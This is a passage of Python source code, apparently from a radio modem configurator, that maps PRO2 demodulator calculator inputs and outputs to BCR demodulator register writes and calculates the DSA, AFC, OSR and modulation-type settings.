468.75kHz pro2_inputs["API_High_perf_Ch_Fil"] = 1 #High performance channel filter 
enabled, don't care since we aren't using this IP pro2_inputs["API_OSRtune"] = pro2_osr_tune pro2_inputs["API_Ch_Fil_Bw_AFC"] = 0 #Disable channel filter switch after AFC, we are not using this channel filter IP pro2_inputs["API_ant_div"] = pro2_ant_div pro2_inputs["API_pm_pattern"] = pro2_pm_pattern pro2_inputs["API_modulation_type"] = pro2_modulation_type pro2_inputs["API_Rsymb"] = baudrate pro2_inputs["API_Fdev"] = deviation pro2_inputs["API_RXBW"] = bandwidth_hz pro2_inputs["API_Manchester"] = (symbol_encoding == model.vars.symbol_encoding.var_enum.Manchester or \ symbol_encoding == model.vars.symbol_encoding.var_enum.Inv_Manchester) pro2_inputs["API_afc_en"] = pro2_afc_mode pro2_inputs["API_Max_Rb_Error"] = baudrate_tol_req_ppm / (1e6) pro2_inputs["API_Chip_Version"] = 2 #Assume Rev B PRO2 with VCO 3.4GHz to 4.2GHz pro2_inputs["API_fc"] = base_frequency_hz pro2_inputs["API_TC"] = 28 #Default ramp time, don't care pro2_inputs["API_fhst"] = 2000 pro2_inputs["API_inputBW"] = 1 #Specify FSK RX BW explicitly pro2_inputs["API_BER_mode"] = test_ber pro2_inputs["API_raw_demod"] = 0 #TODO: Need to implement this later pro2_inputs["API_dsource"] = 0 #Don't care, this is for direct mode TX pro2_inputs["API_hi_pfm_div_mode"] = 1 #Always set to 1 for PRO2 pro2_inputs["API_dsa_mode"] = pro2_dsa_mode pro2_inputs["API_dsm_ratio"] = 1 pro2_inputs["API_Fs_rx_CH"] = pro2_fs_rx_ch pro2_inputs["API_fb_frequency_resolution"] = digmix_res pro2_inputs["API_modulation_index"] = model.vars.modulation_index_actual.value pro2_inputs["Fdev_error"] = fdeverror / 1e6 pro2_inputs["API_pm_len"] = model.vars.preamble_detection_length.value # overwrite BCR demod setting in concurrent mode which is set by forcing bcr_demod_en at input if (model.vars.bcr_demod_en._value_forced != None): pro2_inputs["API_Rsymb"] = model.vars.bcr_conc_baudrate.value pro2_inputs["API_Manchester"] = model.vars.bcr_conc_manchester.value pro2_inputs["API_Fdev"] = model.vars.bcr_conc_deviation.value #Instantiate an object for pro2 inputs and initialize with the input values defined above pro2_input_obj = Pro2OcelotModemCalcInputs(pro2_inputs) #Instantiate the pro2 calculator and initialize with our input object pro2_calculator_obj = Pro2OcelotModemCalc(pro2_input_obj) #Run the pro2 calculator pro2_calculator_obj.calculate() #Assign the pro2 output values to registers / variables self._map_pro2_dsa_outputs(model, pro2_calculator_obj) if bcr_detector_en == 1: self.write_unused_bcr_regs(model) else: self._map_pro2_outputs(model, pro2_calculator_obj) else: #Write default values to the BCR demod regs self.write_unused_pro2_dsa_regs(model) self.write_unused_bcr_regs(model) def _map_pro2_dsa_outputs(self, model, pro2_calculator_obj): antdivmode = model.vars.antdivmode.value # : check phspike_det_thd = pro2_calculator_obj.demodulator.fields.spike_det_thd # : If antenna diversity is enabled, scale up the detection threshold scale = 1.5 # TODO REVERT 1.5 if antdivmode != model.vars.antdivmode.var_enum.DISABLE: phspike_det_thd = scale * phspike_det_thd #Always set ENCFEQUAL to 0 for OOK, otherwise use signal_dsa_mode self._reg_write(model.vars.MODEM_BCRDEMODARR1_ENCFEQUAL, pro2_calculator_obj.demodulator.fields.signal_dsa_mode if pro2_calculator_obj.inputs.API_modulation_type != 1 else 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETEN, pro2_calculator_obj.demodulator.fields.signal_dsa_mode) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_NONSTDPK, pro2_calculator_obj.demodulator.fields.nonstdpk_final) 
self._reg_write(model.vars.MODEM_BCRDEMODARR0_PHSPIKETHD, int(phspike_det_thd)) def write_unused_pro2_dsa_regs(self, model): self._reg_write(model.vars.MODEM_BCRDEMODARR1_ENCFEQUAL, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_NONSTDPK, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_PHSPIKETHD, 0) def _map_pro2_outputs(self,model, pro2_calculator_obj): #This function maps the pro2 calculator outputs to radio configurator variables / outputs # Write BCRDEMODCTRL self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWSYN, pro2_calculator_obj.demodulator.fields.raw_syn) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PH0SIZE, pro2_calculator_obj.demodulator.fields.ph0size) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_LOCKUPBYP, pro2_calculator_obj.demodulator.fields.res_lockup_byp) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFASTMA, pro2_calculator_obj.demodulator.fields.fast_ma) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SPIKEREMOV, pro2_calculator_obj.demodulator.fields.spike_rm_en) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFLTSEL, pro2_calculator_obj.demodulator.fields.rawflt_sel) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PREATH, pro2_calculator_obj.demodulator.fields.preath) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SKIPSYN, pro2_calculator_obj.demodulator.fields.skipsyn) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PMPATTERN, pro2_calculator_obj.demodulator.fields.pm_pattern) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SLICERFAST, pro2_calculator_obj.demodulator.fields.slicer_fast) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_DETECTORSEL, pro2_calculator_obj.demodulator.fields.detector) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PHSRCSEL, pro2_calculator_obj.demodulator.fields.ph_scr_sel) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_CONSCHKBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PULCORRBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_MANCHDLY, 0) # Write BCRDEMODOOK self._reg_write(model.vars.MODEM_BCRDEMODOOK_OOKFRZEN, pro2_calculator_obj.demodulator.fields.ookfrz_en) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWGAIN, int(pro2_calculator_obj.demodulator.fields.rawgain)) self._reg_write(model.vars.MODEM_BCRDEMODOOK_MAFREQDWN, pro2_calculator_obj.demodulator.fields.ma_freqdwn) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCLKEN, pro2_calculator_obj.demodulator.fields.squelch_clk_en) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BWPK, model.vars.calculated_bw_peak.value) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAYSWAL, pro2_calculator_obj.demodulator.fields.decay_swal) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAY, int(pro2_calculator_obj.demodulator.fields.Decay)) self._reg_write(model.vars.MODEM_BCRDEMODOOK_ATTACK, pro2_calculator_obj.demodulator.fields.Attack) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCH, pro2_calculator_obj.demodulator.fields.arr_squelch) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWNDEC, int(pro2_calculator_obj.demodulator.fields.ndec0)) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BCRDEMODOOK,int(enook(pro2_calculator_obj.inputs.API_modulation_type))) self._reg_write(model.vars.MODEM_BCRDEMODOOK_PKTRUNK, 0) #Write BCRCTRL0 self._reg_write(model.vars.MODEM_BCRCTRL0_BCRNCOFF, int(pro2_calculator_obj.demodulator.fields.ncoff)) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRALIGN, pro2_calculator_obj.demodulator.fields.bcr_align_en) self._reg_write(model.vars.MODEM_BCRCTRL0_DISTOGG, pro2_calculator_obj.demodulator.fields.distogg) 
self._reg_write(model.vars.MODEM_BCRCTRL0_CRSLOW, pro2_calculator_obj.demodulator.fields.crslow) self._reg_write(model.vars.MODEM_BCRCTRL0_CRFAST, pro2_calculator_obj.demodulator.fields.crfast) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRERRRSTEN, 1) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRFBBYP, pro2_calculator_obj.demodulator.fields.bcrfbbyp) #Write BCRCTRL1 self._reg_write(model.vars.MODEM_BCRCTRL1_CRGAIN, int(pro2_calculator_obj.demodulator.fields.CR_gain)) self._reg_write(model.vars.MODEM_BCRCTRL1_CGAINX2, pro2_calculator_obj.demodulator.fields.crgainx2) self._reg_write(model.vars.MODEM_BCRCTRL1_RXNCOCOMP, pro2_calculator_obj.demodulator.fields.rxncocomp) self._reg_write(model.vars.MODEM_BCRCTRL1_RXCOMPLAT, pro2_calculator_obj.demodulator.fields.rxcomp_lat) self._reg_write(model.vars.MODEM_BCRCTRL1_ESCMIDPT, pro2_calculator_obj.demodulator.fields.esc_midpt) self._reg_write(model.vars.MODEM_BCRCTRL1_DISMIDPT, pro2_calculator_obj.demodulator.fields.dis_midpt) self._reg_write(model.vars.MODEM_BCRCTRL1_BCROSR, int(pro2_calculator_obj.demodulator.fields.OSR_rx_BCR)) self._reg_write(model.vars.MODEM_BCRCTRL1_ESTOSREN, pro2_calculator_obj.demodulator.fields.est_osr_en) self._reg_write(model.vars.MODEM_BCRCTRL1_BCRSWSYCW, pro2_calculator_obj.demodulator.fields.bcr_sw_sycw) self._reg_write(model.vars.MODEM_BCRCTRL1_PHCOMP2FSK, pro2_calculator_obj.demodulator.kphcomp_2fsk) self._reg_write(model.vars.MODEM_BCRCTRL1_SLICEFBBYP, pro2_calculator_obj.demodulator.fields.slicefbbyp) #Write BCRDEMODAFC0 self._reg_write(model.vars.MODEM_BCRDEMODAFC0_LARGEFREQERR, int(pro2_calculator_obj.demodulator.fields.large_freq_err)) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_AFCGAINOVRFLW, pro2_calculator_obj.demodulator.fields.afcgain_ovr_flw) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_EN2TBEST, pro2_calculator_obj.demodulator.fields.en2Tb_est) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_ENAFCCLKSW, pro2_calculator_obj.demodulator.fields.enafc_clksw) #Write BCRDEMODAFC1 self._reg_write(model.vars.MODEM_BCRDEMODAFC1_LGWAIT, pro2_calculator_obj.demodulator.fields.afc_lgwait) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SHWAIT, pro2_calculator_obj.demodulator.fields.afc_shwait) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_GEARSW, pro2_calculator_obj.demodulator.fields.gear_sw) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_AFCMAEN, pro2_calculator_obj.demodulator.fields.afcma_en) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFZPMEND, pro2_calculator_obj.demodulator.fields.enfzpmend) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_NONFRZEN, pro2_calculator_obj.demodulator.fields.non_frzen) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTWAITCNT, pro2_calculator_obj.demodulator.fields.oneshot_waitcnt) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTAFCEN,pro2_calculator_obj.demodulator.fields.oneshot_afc) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SKIPPMDET, pro2_calculator_obj.demodulator.fields.skip_pm_det) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFCFRZ, pro2_calculator_obj.demodulator.fields.afc_freez_en) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFC, pro2_calculator_obj.demodulator.fields.afc_est_en) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFBPLL, int(pro2_calculator_obj.demodulator.fields.afc_fb_pll)) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_HALFPHCOMP, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_PMRSTEN, 0) #Write BCRDEMOD4FSK0 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_THD4GFSK, int(pro2_calculator_obj.demodulator.fields.thd4gfsk)) 
self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_CODE4GFSK, pro2_calculator_obj.demodulator.fields.code4gfsk) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_PHCOMPBYP, pro2_calculator_obj.demodulator.fields.phcompbyp) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_EN4GFSK, int(en4gfsk(pro2_calculator_obj.inputs.API_modulation_type))) #Write BCRDEMOD4FSK1 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK0, pro2_calculator_obj.demodulator.fields.phcomp_gain_4gfsk0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK1, pro2_calculator_obj.demodulator.fields.phcomp_gain_4gfsk1 & 0x7f) #Remove bit 7 which was used in Pro2 for a different purpose self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_S2PMAP, pro2_calculator_obj.demodulator.fields.s2p_map) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPEN, pro2_calculator_obj.demodulator.fields.thd4gfsk_comp_en) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPRATIO, pro2_calculator_obj.demodulator.fields.thd4gfsk_comp_ratio) #Write BCRDEMODANT self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PHTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANWAIT, pro2_calculator_obj.demodulator.fields.anwait) self._reg_write(model.vars.MODEM_BCRDEMODANT_AGCGAINUPB, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PH, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_BYP1P5, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANT2PMTHD, pro2_calculator_obj.demodulator.fields.ant2pm_thd) self._reg_write(model.vars.MODEM_BCRDEMODANT_SWANTTIMER, 1) self._reg_write(model.vars.MODEM_BCRDEMODANT_BCRDEMODANTDIV, pro2_calculator_obj.demodulator.fields.antdiv) #Write BCRDEMODRSSI self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIARRTHD, pro2_calculator_obj.demodulator.fields.rssi_arr_thd) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_MUTERSSICNT, pro2_calculator_obj.demodulator.fields.mute_rssi_cnt) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIMATAP, pro2_calculator_obj.demodulator.fields.matap) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_PRWOFFSET, 0) #Write BCRDEMODARR0 self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDLO, pro2_calculator_obj.demodulator.fields.schprd_low) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDHI, pro2_calculator_obj.demodulator.fields.schprd_h) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRRSTEN, pro2_calculator_obj.demodulator.fields.arr_rst_en) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRTOLER, pro2_calculator_obj.demodulator.fields.arr_toler) self._reg_write(model.vars.MODEM_BCRDEMODARR0_DIFF0RSTEN, pro2_calculator_obj.demodulator.fields.diff0rst_en) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETTHD, pro2_calculator_obj.demodulator.fields.arrival_thd) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHFRZEN, pro2_calculator_obj.demodulator.fields.sch_frzen) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTEN, pro2_calculator_obj.demodulator.fields.eyexest_en) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTFAST, pro2_calculator_obj.demodulator.fields.eyexest_fast) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETSRC, pro2_calculator_obj.demodulator.fields.arriving_src) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEQUALEN, 0) # Write BCRDEMODARR1 self._reg_write(model.vars.MODEM_BCRDEMODARR1_ARREYEQUAL, int(pro2_calculator_obj.demodulator.fields.arr_eye_qual)) self._reg_write(model.vars.MODEM_BCRDEMODARR1_BCRCFESRC, 1) self._reg_write(model.vars.MODEM_BCRDEMODARR1_KSICOMPEN, 0) # Write BCRDEMODARR2 self._reg_write(model.vars.MODEM_BCRDEMODARR2_RAWDCHKALWAYON, 0) 
self._reg_write(model.vars.MODEM_BCRDEMODARR2_CONSYMOL, 0) # Write BCRDEMODKSI self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI1, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI2, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI3, model.vars.calculated_ksi3.value ) # Write BCRDEMODPMEXP self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPHSCALE , model.vars.calculated_phscale.value) self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPMEXP , 21845) # GET afc gain result digmix_res = model.vars.digmix_res_actual.value model.vars.pro2_afc_gain.value = int(digmix_res * pro2_calculator_obj.demodulator.fields.afc_gain) def write_unused_bcr_regs(self,model): # Write BCRDEMODCTRL self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWSYN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PH0SIZE, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_LOCKUPBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFASTMA, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SPIKEREMOV, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_RAWFLTSEL, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PREATH, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SKIPSYN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PMPATTERN, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_SLICERFAST, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_DETECTORSEL, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PHSRCSEL, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_CONSCHKBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_PULCORRBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_MANCHDLY, 0) # Write BCRDEMODOOK self._reg_write(model.vars.MODEM_BCRDEMODOOK_OOKFRZEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWGAIN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_MAFREQDWN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCLKEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BWPK, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAYSWAL, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_DECAY, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_ATTACK, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_SQUELCH, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_RAWNDEC, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_BCRDEMODOOK, 0) self._reg_write(model.vars.MODEM_BCRDEMODOOK_PKTRUNK, 0) # Write BCRCTRL0 self._reg_write(model.vars.MODEM_BCRCTRL0_BCRNCOFF, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRALIGN, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_DISTOGG, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_CRSLOW, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_CRFAST, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRERRRSTEN, 0) self._reg_write(model.vars.MODEM_BCRCTRL0_BCRFBBYP, 0) # Write BCRCTRL1 self._reg_write(model.vars.MODEM_BCRCTRL1_CRGAIN, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_CGAINX2, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_RXNCOCOMP, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_RXCOMPLAT, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_ESCMIDPT, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_DISMIDPT, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_BCROSR, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_ESTOSREN, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_BCRSWSYCW, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_PHCOMP2FSK, 0) self._reg_write(model.vars.MODEM_BCRCTRL1_SLICEFBBYP, 0) # Write BCRDEMODAFC0 self._reg_write(model.vars.MODEM_BCRDEMODAFC0_LARGEFREQERR, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_AFCGAINOVRFLW, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC0_EN2TBEST, 0) 
self._reg_write(model.vars.MODEM_BCRDEMODAFC0_ENAFCCLKSW, 0) # Write BCRDEMODAFC1 self._reg_write(model.vars.MODEM_BCRDEMODAFC1_LGWAIT, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SHWAIT, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_GEARSW, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_AFCMAEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFZPMEND, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_NONFRZEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTWAITCNT, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ONESHOTAFCEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_SKIPPMDET, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFCFRZ, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENAFC, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_ENFBPLL, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_HALFPHCOMP, 0) self._reg_write(model.vars.MODEM_BCRDEMODAFC1_PMRSTEN, 0) # Write BCRDEMOD4FSK0 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_THD4GFSK, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_CODE4GFSK, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_PHCOMPBYP, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK0_EN4GFSK, 0) # Write BCRDEMOD4FSK1 self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK0, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_PHCOMP4FSK1, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_S2PMAP, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPEN, 0) self._reg_write(model.vars.MODEM_BCRDEMOD4FSK1_FDEVCOMPRATIO, 0) # Write BCRDEMODANT self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PHTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANWAIT, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_AGCGAINUPB, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_SKIP2PH, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_BYP1P5, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_ANT2PMTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_SWANTTIMER, 0) self._reg_write(model.vars.MODEM_BCRDEMODANT_BCRDEMODANTDIV, 0) # Write BCRDEMODRSSI self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIARRTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_MUTERSSICNT, 0) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_PRWOFFSET, 0) self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIMATAP, 0) # Write BCRDEMODARR0 self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDLO, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDHI, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRRSTEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRTOLER, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_DIFF0RSTEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHFRZEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTFAST, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETSRC, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEQUALEN, 0) # Write BCRDEMODARR1 self._reg_write(model.vars.MODEM_BCRDEMODARR1_ARREYEQUAL, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMAX, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMIN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_BCRCFESRC, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_KSICOMPEN, 0) # Write BCRDEMODARR2 self._reg_write(model.vars.MODEM_BCRDEMODARR2_RAWDCHKALWAYON, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR2_CONSYMOL, 0) # Write BCRDEMODKSI self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI1, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI2, 0) 
self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI3, 0) # Write BCRDEMODPMEXP self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPHSCALE, 0) self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPMEXP, 0) def calc_bcr_demod_en(self,model): #This function writes the BCR demod enable register # Load model values into local variables demod_select = model.vars.demod_select.value if (demod_select == model.vars.demod_select.var_enum.BCR): bcr_demod_en = 1 else: bcr_demod_en = 0 #Write the register values model.vars.bcr_demod_en.value = bcr_demod_en def calc_bcr_demod_en_reg(self,model): bcr_demod_en = model.vars.bcr_demod_en.value self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BCRDEMODEN, bcr_demod_en) def calc_pro2_dsa_mode(self,model): preamble_detection_length = model.vars.preamble_detection_length.value mod_type = model.vars.pro2_modulation_type.value antdivmode = model.vars.antdivmode.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if not ber_force_fdm0: if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV \ or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: pro2_dsa_mode = 1 # : always enable dsa mode for antenna diversity elif (mod_type == 1): ## OOK or ASK #Enable for short preamble lengths if preamble_detection_length < 20: pro2_dsa_mode = 1 else: pro2_dsa_mode = 0 else: if (16 <= preamble_detection_length < 48) : pro2_dsa_mode = 1 else: pro2_dsa_mode = 0 else: #Disable DSA for BER testing pro2_dsa_mode = 0 # Load local variables back into model variables model.vars.pro2_dsa_mode.value = pro2_dsa_mode def calc_pro2_afc_mode(self,model): # This function calculates the AFC mode for the pro2 calculator # Load model values into local variables preamble_detection_length = model.vars.preamble_detection_length.value mod_type = model.vars.pro2_modulation_type.value antdivmode = model.vars.antdivmode.value ber_force_freq_comp_off = model.vars.ber_force_freq_comp_off.value if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV \ or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: pro2_afc_mode = 2 # if (preamble_detection_length >= 32): # AFC correction value is fed back to PLL in a pre-defined rate and the internal modem frequency compensation is running until the preamble is detected # pro2_afc_mode = 1 elif (16 <= preamble_detection_length < 48) and ( mod_type!= 1) and not ber_force_freq_comp_off: #AFC correction value is fed back to PLL just once while signal arrival detection is triggered and a pre-defined delay timer will be armed. # The internal modem frequency compensation is running until this delay timer is timeout. pro2_afc_mode = 2 else: # AFC correction value is not fed back to PLL. The internal modem frequency compensation will be frozen once the preamble is detected. 
pro2_afc_mode = 0 # Load local variables back into model variables model.vars.pro2_afc_mode.value = pro2_afc_mode def calc_pro2_osr_tune(self,model): # This function calculates the OSR tune value for the pro2 calculator # For now, just set this to a static 0 # TODO 32: Decide how we want to divide the decimation between dec0/1/osrtune # Load local variables back into model variables model.vars.pro2_osr_tune.value = 0 def calc_pro2_modulation_type(self,model): #This function calculates the pro2 modulation type input # Load model values into local variables mod_type = model.vars.modulation_type.value shaping_filter = model.vars.shaping_filter.value pro2_modulation_type = 1 #OOK by default if (mod_type == model.vars.modulation_type.var_enum.OOK) or (mod_type == model.vars.modulation_type.var_enum.ASK): pro2_modulation_type = 1 elif (mod_type == model.vars.modulation_type.var_enum.FSK2) or \ (mod_type == model.vars.modulation_type.var_enum.MSK): if (shaping_filter == model.vars.shaping_filter.var_enum.Gaussian): pro2_modulation_type = 3 else: pro2_modulation_type = 2 elif (mod_type == model.vars.modulation_type.var_enum.FSK4): if (shaping_filter == model.vars.shaping_filter.var_enum.Gaussian): pro2_modulation_type = 5 else: pro2_modulation_type = 4 # Load local variables back into model variables model.vars.pro2_modulation_type.value = pro2_modulation_type def calc_pro2_pm_pattern(self,model): # This function calculates the preamble pattern value for the pro2 calculator # May add additional preamble pattern cases later, for now this is sufficient # Load model values into local variables preamble_detection_length = model.vars.preamble_detection_length.value preamble_pattern = model.vars.preamble_pattern.value 